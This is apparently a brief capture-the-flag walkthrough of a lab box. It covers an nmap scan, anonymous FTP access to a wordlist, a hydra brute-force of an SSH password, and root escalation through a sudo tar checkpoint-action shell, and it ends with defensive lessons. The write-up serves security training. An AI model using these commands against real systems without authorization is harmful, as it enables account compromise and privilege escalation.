sudo nmap 10.10.10.243
The website doesn't reveal any crucial information for the pentest.
We see that we can make an anonymous login on the ftp service.
There are two files on the ftp server:
task.txt which coontains some indication "signed" by someone called lin;
locks.txt which contains ununderstandable words.
One hint would be to use locks.txt to do a dictionnary attack on lin password for ssh service.
Yes! It works. We can use this password to connect to the target via SSH.
We find the user flag this way in user.txt.
For escalation, a good abit is to check what sudo command the user can perform on the target.
We can use GTFOBINs to see how we can exploit this.
Use SCP service from the SSH protocole instead of FTP.
Use a password manager instead of writing passwords in clear text in a file.
Check sudo right on machines.
Last updated 1 year ago
sudo nmap -A -p 21,22,80 10.10.10.243
ftp 10.10.170.79
hydra -s 22 -l lin -P locks.txt 10.10.10.243 ssh -V
sudo -l
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
